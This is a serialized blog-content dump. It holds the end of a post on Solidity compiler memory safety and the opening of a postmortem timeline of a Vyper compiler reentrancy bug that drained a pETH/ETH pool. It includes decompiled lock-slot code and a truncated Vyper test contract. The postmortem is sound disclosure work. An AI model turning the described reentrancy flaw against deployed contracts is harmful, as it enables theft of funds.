}\n",[36895],{"type":27,"tag":84,"props":36896,"children":36897},{"__ignoreMap":7},[36898,36906,36914,36921,36957,36964,36972,36980,36988,36996,37004,37017,37030,37038],{"type":27,"tag":207,"props":36899,"children":36900},{"class":209,"line":210},[36901],{"type":27,"tag":207,"props":36902,"children":36903},{"style":4647},[36904],{"type":33,"value":36905},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n",{"type":27,"tag":207,"props":36907,"children":36908},{"class":209,"line":244},[36909],{"type":27,"tag":207,"props":36910,"children":36911},{"style":4647},[36912],{"type":33,"value":36913},"// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n",{"type":27,"tag":207,"props":36915,"children":36916},{"class":209,"line":270},[36917],{"type":27,"tag":207,"props":36918,"children":36919},{"emptyLinePlaceholder":19},[36920],{"type":33,"value":2062},{"type":27,"tag":207,"props":36922,"children":36923},{"class":209,"line":296},[36924,36929,36934,36939,36943,36948,36953],{"type":27,"tag":207,"props":36925,"children":36926},{"style":8920},[36927],{"type":33,"value":36928},"string",{"type":27,"tag":207,"props":36930,"children":36931},{"style":238},[36932],{"type":33,"value":36933}," IRGenerator::",{"type":27,"tag":207,"props":36935,"children":36936},{"style":1335},[36937],{"type":33,"value":36938},"memoryInit",{"type":27,"tag":207,"props":36940,"children":36941},{"style":238},[36942],{"type":33,"value":1343},{"type":27,"tag":207,"props":36944,"children":36945},{"style":214},[36946],{"type":33,"value":36947},"bool",{"type":27,"tag":207,"props":36949,"children":36950},{"style":220},[36951],{"type":33,"value":36952}," _useMemoryGuard",{"type":27,"tag":207,"props":36954,"children":36955},{"style":238},[36956],{"type":33,"value":10449},{"type":27,"tag":207,"props":36958,"children":36959},{"class":209,"line":445},[36960],{"type":27,"tag":207,"props":36961,"children":36962},{"style":238},[36963],{"type":33,"value":18158},{"type":27,"tag":207,"props":36965,"children":36966},{"class":209,"line":867},[36967],{"type":27,"tag":207,"props":36968,"children":36969},{"style":4647},[36970],{"type":33,"value":36971}," // This function should be called at the beginning of the EVM call frame\n",{"type":27,"tag":207,"props":36973,"children":36974},{"class":209,"line":892},[36975],{"type":27,"tag":207,"props":36976,"children":36977},{"style":4647},[36978],{"type":33,"value":36979}," // and thus can assume all memory to be zero, including the contents of\n",{"type":27,"tag":207,"props":36981,"children":36982},{"class":209,"line":1475},[36983],{"type":27,"tag":207,"props":36984,"children":36985},{"style":4647},[36986],{"type":33,"value":36987}," // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n",{"type":27,"tag":207,"props":36989,"children":36990},{"class":209,"line":2065},[36991],{"type":27,"tag":207,"props":36992,"children":36993},{"style":376},[36994],{"type":33,"value":36995}," return\n",{"type":27,"tag":207,"props":36997,"children":36998},{"class":209,"line":2092},[36999],{"type":27,"tag":207,"props":37000,"children":37001},{"style":238},[37002],{"type":33,"value":37003}," Whiskers{\n",{"type":27,"tag":207,"props":37005,"children":37006},{"class":209,"line":2130},[37007,37012],{"type":27,"tag":207,"props":37008,"children":37009},{"style":238},[37010],{"type":33,"value":37011}," _useMemoryGuard ",{"type":27,"tag":207,"props":37013,"children":37014},{"style":226},[37015],{"type":33,"value":37016},"?\n",{"type":27,"tag":207,"props":37018,"children":37019},{"class":209,"line":2168},[37020,37025],{"type":27,"tag":207,"props":37021,"children":37022},{"style":1325},[37023],{"type":33,"value":37024}," \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\"",{"type":27,"tag":207,"props":37026,"children":37027},{"style":226},[37028],{"type":33,"value":37029}," :\n",{"type":27,"tag":207,"props":37031,"children":37032},{"class":209,"line":4095},[37033],{"type":27,"tag":207,"props":37034,"children":37035},{"style":1325},[37036],{"type":33,"value":37037}," \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n",{"type":27,"tag":207,"props":37039,"children":37040},{"class":209,"line":4103},[37041],{"type":27,"tag":207,"props":37042,"children":37043},{"style":238},[37044],{"type":33,"value":5312},{"type":27,"tag":36,"props":37046,"children":37047},{},[37048,37053,37055,37061],{"type":27,"tag":84,"props":37049,"children":37051},{"className":37050},[],[37052],{"type":33,"value":36641},{"type":33,"value":37054}," will now no longer have ",{"type":27,"tag":84,"props":37056,"children":37058},{"className":37057},[],[37059],{"type":33,"value":37060},"memoryguard(0x80)",{"type":33,"value":37062}," as expected.",{"type":27,"tag":101,"props":37064,"children":37066},{"className":11758,"code":37065,"language":11757,"meta":7,"style":7}," /// @src 0:26:371 \"contract XXX {...\"\n mstore(64, 128)\n",[37067],{"type":27,"tag":84,"props":37068,"children":37069},{"__ignoreMap":7},[37070,37085],{"type":27,"tag":207,"props":37071,"children":37072},{"class":209,"line":210},[37073,37077,37081],{"type":27,"tag":207,"props":37074,"children":37075},{"style":4647},[37076],{"type":33,"value":36658},{"type":27,"tag":207,"props":37078,"children":37079},{"style":214},[37080],{"type":33,"value":36663},{"type":27,"tag":207,"props":37082,"children":37083},{"style":4647},[37084],{"type":33,"value":36668},{"type":27,"tag":207,"props":37086,"children":37087},{"class":209,"line":244},[37088,37093,37097,37101,37105,37109],{"type":27,"tag":207,"props":37089,"children":37090},{"style":1335},[37091],{"type":33,"value":37092}," mstore",{"type":27,"tag":207,"props":37094,"children":37095},{"style":238},[37096],{"type":33,"value":1343},{"type":27,"tag":207,"props":37098,"children":37099},{"style":232},[37100],{"type":33,"value":2889},{"type":27,"tag":207,"props":37102,"children":37103},{"style":238},[37104],{"type":33,"value":1123},{"type":27,"tag":207,"props":37106,"children":37107},{"style":232},[37108],{"type":33,"value":6837},{"type":27,"tag":207,"props":37110,"children":37111},{"style":238},[37112],{"type":33,"value":10449},{"type":27,"tag":36,"props":37114,"children":37115},{},[37116,37118,37123,37125,37130],{"type":33,"value":37117},"Semantically, the absence of ",{"type":27,"tag":84,"props":37119,"children":37121},{"className":37120},[],[37122],{"type":33,"value":36633},{"type":33,"value":37124}," means that the IR generator is telling the optimizer that it cannot guarantee the ",{"type":27,"tag":84,"props":37126,"children":37128},{"className":37127},[],[37129],{"type":33,"value":36633},{"type":33,"value":37131}," invariant.",{"type":27,"tag":10222,"props":37133,"children":37134},{},[37135],{"type":27,"tag":36,"props":37136,"children":37137},{},[37138,37139,37144,37145,37150,37151,37156],{"type":33,"value":36726},{"type":27,"tag":84,"props":37140,"children":37142},{"className":37141},[],[37143],{"type":33,"value":36732},{"type":33,"value":36734},{"type":27,"tag":84,"props":37146,"children":37148},{"className":37147},[],[37149],{"type":33,"value":36740},{"type":33,"value":36742},{"type":27,"tag":84,"props":37152,"children":37154},{"className":37153},[],[37155],{"type":33,"value":21225},{"type":33,"value":1041},{"type":27,"tag":36,"props":37158,"children":37159},{},[37160],{"type":33,"value":37161},"This makes sense. Without stricter guarantees by the programmer, memory-unsafe assembly can touch memory anywhere it wants. Because the optimizer no longer has this guarantee, it cannot use memory in any of its optimization passes.",{"type":27,"tag":28,"props":37163,"children":37165},{"id":37164},"undefined-behavior",[37166],{"type":33,"value":37167},"Undefined Behavior",{"type":27,"tag":36,"props":37169,"children":37170},{},[37171,37173,37178,37180,37185,37187,37193],{"type":33,"value":37172},"How strict is memory safety? When it comes to ",{"type":27,"tag":84,"props":37174,"children":37176},{"className":37175},[],[37177],{"type":33,"value":36633},{"type":33,"value":37179},", only touching memory after 0x80 seems to matter. Is ",{"type":27,"tag":84,"props":37181,"children":37183},{"className":37182},[],[37184],{"type":33,"value":36293},{"type":33,"value":37186}," annotated assembly that touches memory at ",{"type":27,"tag":84,"props":37188,"children":37190},{"className":37189},[],[37191],{"type":33,"value":37192},"[0x40, 0x7f]",{"type":33,"value":37194}," really safe?",{"type":27,"tag":36,"props":37196,"children":37197},{},[37198,37199,37206,37208,37213],{"type":33,"value":23888},{"type":27,"tag":47,"props":37200,"children":37203},{"href":37201,"rel":37202},"https://buildmedia.readthedocs.org/media/pdf/solidity/develop/solidity.pdf",[51],[37204],{"type":33,"value":37205},"Solidity documentation",{"type":33,"value":37207}," mentions ",{"type":27,"tag":942,"props":37209,"children":37210},{},[37211],{"type":33,"value":37212},"undefined behavior",{"type":33,"value":37214}," three times.",{"type":27,"tag":12719,"props":37216,"children":37217},{},[37218,37223,37238],{"type":27,"tag":1232,"props":37219,"children":37220},{},[37221],{"type":33,"value":37222},"The existence of a dangling reference",{"type":27,"tag":1232,"props":37224,"children":37225},{},[37226,37228],{"type":33,"value":37227},"Using verbatim improperly",{"type":27,"tag":22749,"props":37229,"children":37230},{},[37231],{"type":27,"tag":47,"props":37232,"children":37236},{"href":37233,"ariaDescribedBy":37234,"dataFootnoteRef":7,"id":37235},"#user-content-fn-2",[22756],"user-content-fnref-2",[37237],{"type":33,"value":1744},{"type":27,"tag":1232,"props":37239,"children":37240},{},[37241],{"type":33,"value":37242},"Violating the memory model with in-line assembly marked as \"memory-safe\".",{"type":27,"tag":36,"props":37244,"children":37245},{},[37246],{"type":33,"value":37247},"Why does this matter?",{"type":27,"tag":36,"props":37249,"children":37250},{},[37251,37253,37260,37262,37269],{"type":33,"value":37252},"Assumptions about the program code can enable powerful optimizations - that's why ",{"type":27,"tag":47,"props":37254,"children":37257},{"href":37255,"rel":37256},"https://kristerw.blogspot.com/2016/02/how-undefined-signed-overflow-enables.html",[51],[37258],{"type":33,"value":37259},"signed integer overflow is undefined",{"type":33,"value":37261},". Strictly following the compiler model is critical. Undefined behavior materializes as tricky bugs ",{"type":27,"tag":47,"props":37263,"children":37266},{"href":37264,"rel":37265},"https://blog.regehr.org/archives/1307",[51],[37267],{"type":33,"value":37268},"years down the line",{"type":33,"value":1041},{"type":27,"tag":36,"props":37271,"children":37272},{},[37273,37275,37282,37283,37288],{"type":33,"value":37274},"Going back to Solidity, the specification makes ",{"type":27,"tag":47,"props":37276,"children":37279},{"href":37277,"rel":37278},"https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html",[51],[37280],{"type":33,"value":37281},"it unambiguously clear",{"type":33,"value":1055},{"type":27,"tag":942,"props":37284,"children":37285},{},[37286],{"type":33,"value":37287},"Thou shalt not modify the zero slot",{"type":33,"value":1041},{"type":27,"tag":10222,"props":37290,"children":37291},{},[37292],{"type":27,"tag":36,"props":37293,"children":37294},{},[37295],{"type":33,"value":37296},"The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).",{"type":27,"tag":36,"props":37298,"children":37299},{},[37300,37302,37307],{"type":33,"value":37301},"Any code that touches the zero slot at 0x60 is very clearly violating the specification. Does this matter though? This is where the semantics between Solidity and YUL gets tricky. Recall that the zero slot is a construction ",{"type":27,"tag":942,"props":37303,"children":37304},{},[37305],{"type":33,"value":37306},"in Solidity",{"type":33,"value":1041},{"type":27,"tag":36,"props":37309,"children":37310},{},[37311],{"type":33,"value":37312},"Even though there's no explicit guarantee that inline assembly will be emitted verbatim during generation",{"type":27,"tag":12719,"props":37314,"children":37315},{},[37316],{"type":27,"tag":1232,"props":37317,"children":37318},{},[37319,37321,37328],{"type":33,"value":37320},"It very clearly ",{"type":27,"tag":47,"props":37322,"children":37325},{"href":37323,"rel":37324},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGeneratorForStatements.cpp#L2216",[51],[37326],{"type":33,"value":37327},"holds true today",{"type":33,"value":1041},{"type":27,"tag":101,"props":37330,"children":37332},{"className":8877,"code":37331,"language":8876,"meta":7,"style":7},"bool IRGeneratorForStatements::visit(InlineAssembly const& _inlineAsm)\n{\n setLocation(_inlineAsm);\n if (*_inlineAsm.annotation().hasMemoryEffects && !_inlineAsm.annotation().markedMemorySafe)\n m_context.setMemoryUnsafeInlineAssemblySeen();\n CopyTranslate bodyCopier{_inlineAsm.dialect(), m_context, _inlineAsm.annotation().externalReferences};\n\n yul::Statement modified = bodyCopier(_inlineAsm.operations());`\n",[37333],{"type":27,"tag":84,"props":37334,"children":37335},{"__ignoreMap":7},[37336,37376,37383,37396,37468,37489,37540,37547],{"type":27,"tag":207,"props":37337,"children":37338},{"class":209,"line":210},[37339,37343,37348,37353,37357,37362,37367,37372],{"type":27,"tag":207,"props":37340,"children":37341},{"style":214},[37342],{"type":33,"value":36947},{"type":27,"tag":207,"props":37344,"children":37345},{"style":238},[37346],{"type":33,"value":37347}," IRGeneratorForStatements::",{"type":27,"tag":207,"props":37349,"children":37350},{"style":1335},[37351],{"type":33,"value":37352},"visit",{"type":27,"tag":207,"props":37354,"children":37355},{"style":238},[37356],{"type":33,"value":1343},{"type":27,"tag":207,"props":37358,"children":37359},{"style":8920},[37360],{"type":33,"value":37361},"InlineAssembly",{"type":27,"tag":207,"props":37363,"children":37364},{"style":214},[37365],{"type":33,"value":37366}," const&",{"type":27,"tag":207,"props":37368,"children":37369},{"style":220},[37370],{"type":33,"value":37371}," _inlineAsm",{"type":27,"tag":207,"props":37373,"children":37374},{"style":238},[37375],{"type":33,"value":10449},{"type":27,"tag":207,"props":37377,"children":37378},{"class":209,"line":244},[37379],{"type":27,"tag":207,"props":37380,"children":37381},{"style":238},[37382],{"type":33,"value":18158},{"type":27,"tag":207,"props":37384,"children":37385},{"class":209,"line":270},[37386,37391],{"type":27,"tag":207,"props":37387,"children":37388},{"style":1335},[37389],{"type":33,"value":37390}," setLocation",{"type":27,"tag":207,"props":37392,"children":37393},{"style":238},[37394],{"type":33,"value":37395},"(_inlineAsm);\n",{"type":27,"tag":207,"props":37397,"children":37398},{"class":209,"line":296},[37399,37403,37407,37411,37416,37420,37425,37430,37435,37439,37443,37447,37451,37455,37459,37464],{"type":27,"tag":207,"props":37400,"children":37401},{"style":376},[37402],{"type":33,"value":19556},{"type":27,"tag":207,"props":37404,"children":37405},{"style":238},[37406],{"type":33,"value":686},{"type":27,"tag":207,"props":37408,"children":37409},{"style":226},[37410],{"type":33,"value":9286},{"type":27,"tag":207,"props":37412,"children":37413},{"style":220},[37414],{"type":33,"value":37415},"_inlineAsm",{"type":27,"tag":207,"props":37417,"children":37418},{"style":238},[37419],{"type":33,"value":1041},{"type":27,"tag":207,"props":37421,"children":37422},{"style":1335},[37423],{"type":33,"value":37424},"annotation",{"type":27,"tag":207,"props":37426,"children":37427},{"style":238},[37428],{"type":33,"value":37429},"().",{"type":27,"tag":207,"props":37431,"children":37432},{"style":220},[37433],{"type":33,"value":37434},"hasMemoryEffects",{"type":27,"tag":207,"props":37436,"children":37437},{"style":226},[37438],{"type":33,"value":21461},{"type":27,"tag":207,"props":37440,"children":37441},{"style":226},[37442],{"type":33,"value":20141},{"type":27,"tag":207,"props":37444,"children":37445},{"style":220},[37446],{"type":33,"value":37415},{"type":27,"tag":207,"props":37448,"children":37449},{"style":238},[37450],{"type":33,"value":1041},{"type":27,"tag":207,"props":37452,"children":37453},{"style":1335},[37454],{"type":33,"value":37424},{"type":27,"tag":207,"props":37456,"children":37457},{"style":238},[37458],{"type":33,"value":37429},{"type":27,"tag":207,"props":37460,"children":37461},{"style":220},[37462],{"type":33,"value":37463},"markedMemorySafe",{"type":27,"tag":207,"props":37465,"children":37466},{"style":238},[37467],{"type":33,"value":10449},{"type":27,"tag":207,"props":37469,"children":37470},{"class":209,"line":445},[37471,37476,37480,37485],{"type":27,"tag":207,"props":37472,"children":37473},{"style":220},[37474],{"type":33,"value":37475}," m_context",{"type":27,"tag":207,"props":37477,"children":37478},{"style":238},[37479],{"type":33,"value":1041},{"type":27,"tag":207,"props":37481,"children":37482},{"style":1335},[37483],{"type":33,"value":37484},"setMemoryUnsafeInlineAssemblySeen",{"type":27,"tag":207,"props":37486,"children":37487},{"style":238},[37488],{"type":33,"value":4301},{"type":27,"tag":207,"props":37490,"children":37491},{"class":209,"line":867},[37492,37497,37501,37505,37510,37515,37519,37523,37527,37531,37536],{"type":27,"tag":207,"props":37493,"children":37494},{"style":238},[37495],{"type":33,"value":37496}," CopyTranslate bodyCopier{",{"type":27,"tag":207,"props":37498,"children":37499},{"style":220},[37500],{"type":33,"value":37415},{"type":27,"tag":207,"props":37502,"children":37503},{"style":238},[37504],{"type":33,"value":1041},{"type":27,"tag":207,"props":37506,"children":37507},{"style":1335},[37508],{"type":33,"value":37509},"dialect",{"type":27,"tag":207,"props":37511,"children":37512},{"style":238},[37513],{"type":33,"value":37514},"(), m_context, ",{"type":27,"tag":207,"props":37516,"children":37517},{"style":220},[37518],{"type":33,"value":37415},{"type":27,"tag":207,"props":37520,"children":37521},{"style":238},[37522],{"type":33,"value":1041},{"type":27,"tag":207,"props":37524,"children":37525},{"style":1335},[37526],{"type":33,"value":37424},{"type":27,"tag":207,"props":37528,"children":37529},{"style":238},[37530],{"type":33,"value":37429},{"type":27,"tag":207,"props":37532,"children":37533},{"style":220},[37534],{"type":33,"value":37535},"externalReferences",{"type":27,"tag":207,"props":37537,"children":37538},{"style":238},[37539],{"type":33,"value":23852},{"type":27,"tag":207,"props":37541,"children":37542},{"class":209,"line":892},[37543],{"type":27,"tag":207,"props":37544,"children":37545},{"emptyLinePlaceholder":19},[37546],{"type":33,"value":2062},{"type":27,"tag":207,"props":37548,"children":37549},{"class":209,"line":1475},[37550,37555,37559,37564,37568,37572,37576,37581],{"type":27,"tag":207,"props":37551,"children":37552},{"style":238},[37553],{"type":33,"value":37554}," yul::Statement modified ",{"type":27,"tag":207,"props":37556,"children":37557},{"style":226},[37558],{"type":33,"value":10380},{"type":27,"tag":207,"props":37560,"children":37561},{"style":1335},[37562],{"type":33,"value":37563}," bodyCopier",{"type":27,"tag":207,"props":37565,"children":37566},{"style":238},[37567],{"type":33,"value":1343},{"type":27,"tag":207,"props":37569,"children":37570},{"style":220},[37571],{"type":33,"value":37415},{"type":27,"tag":207,"props":37573,"children":37574},{"style":238},[37575],{"type":33,"value":1041},{"type":27,"tag":207,"props":37577,"children":37578},{"style":1335},[37579],{"type":33,"value":37580},"operations",{"type":27,"tag":207,"props":37582,"children":37583},{"style":238},[37584],{"type":33,"value":37585},"());`\n",{"type":27,"tag":12719,"props":37587,"children":37588},{"start":244},[37589],{"type":27,"tag":1232,"props":37590,"children":37591},{},[37592],{"type":33,"value":37593},"It would require a pretty contrived compiler implementation to meaningfully modify assembly statements before optimization.",{"type":27,"tag":36,"props":37595,"children":37596},{},[37597],{"type":33,"value":37598},"As long as the invariants are upheld before and after the assembly block executes, the code is probably safe.",{"type":27,"tag":28,"props":37600,"children":37601},{"id":12591},[37602],{"type":33,"value":12594},{"type":27,"tag":36,"props":37604,"children":37605},{},[37606],{"type":33,"value":37607},"In this blog post, we present an exploration of the Solidity compiler. This aims to serve as a useful reference for the inquisitive. Compilers are extremely complex with implicit and explicit assumptions. When in doubt, read the source code. So what exactly is memory safety?",{"type":27,"tag":36,"props":37609,"children":37610},{},[37611],{"type":33,"value":37612},"It's a promise between YUL generation and optimization.",{"type":27,"tag":25692,"props":37614,"children":37616},{"className":37615,"dataFootnotes":7},[25695],[37617,37622],{"type":27,"tag":28,"props":37618,"children":37620},{"className":37619,"id":22756},[25700],[37621],{"type":33,"value":25703},{"type":27,"tag":12719,"props":37623,"children":37624},{},[37625,37659],{"type":27,"tag":1232,"props":37626,"children":37628},{"id":37627},"user-content-fn-1",[37629,37631,37636,37638,37644,37646,37651,37653],{"type":33,"value":37630},"As an interesting aside, ",{"type":27,"tag":84,"props":37632,"children":37634},{"className":37633},[],[37635],{"type":33,"value":36633},{"type":33,"value":37637}," is an opaque function which prevents optimizations from reasoning about the free memory pointer. This leads to some rather counterintitive behavior -- ",{"type":27,"tag":84,"props":37639,"children":37641},{"className":37640},[],[37642],{"type":33,"value":37643},"memory-unsafe",{"type":33,"value":37645}," code can ",{"type":27,"tag":942,"props":37647,"children":37648},{},[37649],{"type":33,"value":37650},"decrease",{"type":33,"value":37652}," gas consumption, especially in the YUL header. ",{"type":27,"tag":47,"props":37654,"children":37657},{"href":37655,"ariaLabel":25805,"className":37656,"dataFootnoteBackref":7},"#user-content-fnref-1",[25807],[37658],{"type":33,"value":25810},{"type":27,"tag":1232,"props":37660,"children":37662},{"id":37661},"user-content-fn-2",[37663,37665,37670,37672],{"type":33,"value":37664},"Unfortunately the documentation only presents a \"non-exhaustive list of restrictions\" on verbatim bytecode. In practice, it seems hard to ",{"type":27,"tag":942,"props":37666,"children":37667},{},[37668],{"type":33,"value":37669},"guarantee",{"type":33,"value":37671}," behavior with opaque bytes. ",{"type":27,"tag":47,"props":37673,"children":37676},{"href":37674,"ariaLabel":25825,"className":37675,"dataFootnoteBackref":7},"#user-content-fnref-2",[25807],[37677],{"type":33,"value":25810},{"type":27,"tag":10127,"props":37679,"children":37680},{},[37681],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":37683},[37684,37685,37686,37687,37688,37689,37690],{"id":30,"depth":244,"text":34},{"id":36333,"depth":244,"text":36336},{"id":36595,"depth":244,"text":36598},{"id":36328,"depth":244,"text":36818},{"id":37164,"depth":244,"text":37167},{"id":12591,"depth":244,"text":12594},{"id":22756,"depth":244,"text":25703},"content:blog:2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety",{"_path":37695,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":37696,"description":37697,"author":13003,"image":37698,"date":37700,"isFeatured":19,"onBlogPage":19,"tags":37701,"body":37703,"_type":10152,"_id":38454,"_source":10154,"_file":38455,"_stem":38456,"_extension":10157},"/blog/2023-08-01-vyper-timeline","Vyper Hack Timeline","A timeline and postmortem for the Vyper compiler bug. Thoughts on trust assumptions, vulnerability disclosures, and whitehack recoveries.",{"src":37699,"height":18,"width":18},"/posts/vyper-timeline/header.jpg","2023-08-01",[37702,36276],"vyper",{"type":24,"children":37704,"toc":38445},[37705,37710,37715,37720,37726,37731,37749,37759,37764,37772,37782,37801,37881,37891,38051,38056,38061,38071,38078,38083,38088,38102,38107,38124,38141,38160,38170,38183,38188,38201,38206,38211,38221,38248,38258,38288,38294,38303,38309,38314,38319,38324,38330,38335,38349,38354,38359,38364,38370,38375,38388,38414,38419,38441],{"type":27,"tag":36,"props":37706,"children":37707},{},[37708],{"type":33,"value":37709},"\"Trust but verify\" is a common adage. \"Hindsight is 20/20\" is another one. The best bugs are those hiding in plain sight.",{"type":27,"tag":36,"props":37711,"children":37712},{},[37713],{"type":33,"value":37714},"Compiler bugs are located deep in the supply chain, making their effects far more widespread than normal protocol bugs. Numerous contracts across different chains were compiled with vulnerable Vyper versions - it was a race against blackhats.",{"type":27,"tag":36,"props":37716,"children":37717},{},[37718],{"type":33,"value":37719},"Here's how it all happened.",{"type":27,"tag":28,"props":37721,"children":37723},{"id":37722},"timeline",[37724],{"type":33,"value":37725},"Timeline",{"type":27,"tag":36,"props":37727,"children":37728},{},[37729],{"type":33,"value":37730},"As a note, I'll use the \"we\" pronoun loosely here. I think I personally made some insightful contributions towards the initial vulnerability discovery but countless others helped far more throughout the entire process.",{"type":27,"tag":36,"props":37732,"children":37733},{},[37734,37739,37741,37748],{"type":27,"tag":12606,"props":37735,"children":37736},{},[37737],{"type":33,"value":37738},"13:10 UTC",{"type":33,"value":37740}," pETH/ETH was ",{"type":27,"tag":47,"props":37742,"children":37745},{"href":37743,"rel":37744},"https://etherscan.io/tx/0xa84aa065ce61dbb1eb50ab6ae67fc31a9da50dd2c74eefd561661bfce2f1620c",[51],[37746],{"type":33,"value":37747},"drained of $11M",{"type":33,"value":1041},{"type":27,"tag":36,"props":37750,"children":37751},{},[37752,37757],{"type":27,"tag":12606,"props":37753,"children":37754},{},[37755],{"type":33,"value":37756},"13:19 UTC",{"type":33,"value":37758}," Michal posted in ETHSecurity about a sudden drop in pETH price.",{"type":27,"tag":36,"props":37760,"children":37761},{},[37762],{"type":33,"value":37763},"Igor first noticed something was off. Thanks to him, we dug deeper.",{"type":27,"tag":10222,"props":37765,"children":37766},{},[37767],{"type":27,"tag":36,"props":37768,"children":37769},{},[37770],{"type":33,"value":37771},"But how did the bot reenter into add_liquidity() from remove_liquidity()?",{"type":27,"tag":36,"props":37773,"children":37774},{},[37775,37780],{"type":27,"tag":12606,"props":37776,"children":37777},{},[37778],{"type":33,"value":37779},"14:01 UTC",{"type":33,"value":37781}," A warroom was formed around this comment.",{"type":27,"tag":36,"props":37783,"children":37784},{},[37785,37790,37792,37799],{"type":27,"tag":12606,"props":37786,"children":37787},{},[37788],{"type":33,"value":37789},"14:07 UTC",{"type":33,"value":37791}," We decompiled the JPEGd contract ",{"type":27,"tag":47,"props":37793,"children":37796},{"href":37794,"rel":37795},"https://ethervm.io/decompile",[51],[37797],{"type":33,"value":37798},"with our favorite decompiler",{"type":33,"value":37800}," and noted a difference in reentrancy guard storage slot.",{"type":27,"tag":101,"props":37802,"children":37806},{"className":37803,"code":37804,"language":37805,"meta":7,"style":7},"language-yul shiki shiki-themes slack-dark","// Dispatch table entry for add_liquidity(uint256[2],uint256)\nlabel_0057:\n if (storage[0x00]) { revert(memory[0x00:0x00]); }\n storage[0x00] = 0x01;\n\n// Dispatch table entry for remove_liquidity(uint256,uint256[2])\nlabel_1AF3:\n if (storage[0x02]) { revert(memory[0x00:0x00]); }\n storage[0x02] = 0x01;\n","yul",[37807],{"type":27,"tag":84,"props":37808,"children":37809},{"__ignoreMap":7},[37810,37818,37826,37834,37842,37849,37857,37865,37873],{"type":27,"tag":207,"props":37811,"children":37812},{"class":209,"line":210},[37813],{"type":27,"tag":207,"props":37814,"children":37815},{},[37816],{"type":33,"value":37817},"// Dispatch table entry for add_liquidity(uint256[2],uint256)\n",{"type":27,"tag":207,"props":37819,"children":37820},{"class":209,"line":244},[37821],{"type":27,"tag":207,"props":37822,"children":37823},{},[37824],{"type":33,"value":37825},"label_0057:\n",{"type":27,"tag":207,"props":37827,"children":37828},{"class":209,"line":270},[37829],{"type":27,"tag":207,"props":37830,"children":37831},{},[37832],{"type":33,"value":37833}," if (storage[0x00]) { revert(memory[0x00:0x00]); }\n",{"type":27,"tag":207,"props":37835,"children":37836},{"class":209,"line":296},[37837],{"type":27,"tag":207,"props":37838,"children":37839},{},[37840],{"type":33,"value":37841}," storage[0x00] = 0x01;\n",{"type":27,"tag":207,"props":37843,"children":37844},{"class":209,"line":445},[37845],{"type":27,"tag":207,"props":37846,"children":37847},{"emptyLinePlaceholder":19},[37848],{"type":33,"value":2062},{"type":27,"tag":207,"props":37850,"children":37851},{"class":209,"line":867},[37852],{"type":27,"tag":207,"props":37853,"children":37854},{},[37855],{"type":33,"value":37856},"// Dispatch table entry for remove_liquidity(uint256,uint256[2])\n",{"type":27,"tag":207,"props":37858,"children":37859},{"class":209,"line":892},[37860],{"type":27,"tag":207,"props":37861,"children":37862},{},[37863],{"type":33,"value":37864},"label_1AF3:\n",{"type":27,"tag":207,"props":37866,"children":37867},{"class":209,"line":1475},[37868],{"type":27,"tag":207,"props":37869,"children":37870},{},[37871],{"type":33,"value":37872}," if (storage[0x02]) { revert(memory[0x00:0x00]); }\n",{"type":27,"tag":207,"props":37874,"children":37875},{"class":209,"line":2065},[37876],{"type":27,"tag":207,"props":37877,"children":37878},{},[37879],{"type":33,"value":37880}," storage[0x02] = 0x01;\n",{"type":27,"tag":36,"props":37882,"children":37883},{},[37884,37889],{"type":27,"tag":12606,"props":37885,"children":37886},{},[37887],{"type":33,"value":37888},"14:27 UTC",{"type":33,"value":37890}," We confirmed this behavior with a simple local test contract.",{"type":27,"tag":101,"props":37892,"children":37894},{"className":26732,"code":37893,"language":26731,"meta":7,"style":7},"@external\n@nonreentrant(\"lock\")\ndef test(addr: address) -> bool:\n return True\n\n@external\n@nonreentrant(\"lock\")\ndef test2(addr: address) -> bool:\n return False\n",[37895],{"type":27,"tag":84,"props":37896,"children":37897},{"__ignoreMap":7},[37898,37906,37927,37962,37974,37981,37988,38007,38039],{"type":27,"tag":207,"props":37899,"children":37900},{"class":209,"line":210},[37901],{"type":27,"tag":207,"props":37902,"children":37903},{"style":1335},[37904],{"type":33,"value":37905},"@external\n",{"type":27,"tag":207,"props":37907,"children":37908},{"class":209,"line":244},[37909,37914,37918,37923],{"type":27,"tag":207,"props":37910,"children":37911},{"style":1335},[37912],{"type":33,"value":37913},"@nonreentrant",{"type":27,"tag":207,"props":37915,"children":37916},{"style":238},[37917],{"type":33,"value":1343},{"type":27,"tag":207,"props":37919,"children":37920},{"style":1325},[37921],{"type":33,"value":37922},"\"lock\"",{"type":27,"tag":207,"props":37924,"children":37925},{"style":238},[37926],{"type":33,"value":10449},{"type":27,"tag":207,"props":37928,"children":37929},{"class":209,"line":270},[37930,37935,37940,37944,37949,37954,37958],{"type":27,"tag":207,"props":37931,"children":37932},{"style":214},[37933],{"type":33,"value":37934},"def",{"type":27,"tag":207,"props":37936,"children":37937},{"style":1335},[37938],{"type":33,"value":37939}," test",{"type":27,"tag":207,"props":37941,"children":37942},{"style":238},[37943],{"type":33,"value":1343},{"type":27,"tag":207,"props":37945,"children":37946},{"style":220},[37947],{"type":33,"value":37948},"addr",{"type":27,"tag":207,"props":37950,"children":37951},{"style":238},[37952],{"type":33,"value":37953},": address) -> ",{"type":27,"tag":207,"props":37955,"children":37956},{"style":8920},[37957],{"type":33,"value":36947},{"type":27,"tag":207,"props":37959,"children":37960},{"style":238},[37961],{"type":33,"value":12851},{"type":27,"tag":207,"props":37963,"children":37964},{"class":209,"line":296},[37965,37969],{"type":27,"tag":207,"props":37966,"children":37967},{"style":376},[37968],{"type":33,"value":8986},{"type":27,"tag":207,"props":37970,"children":37971},{"style":214},[37972],{"type":33,"value":37973}," 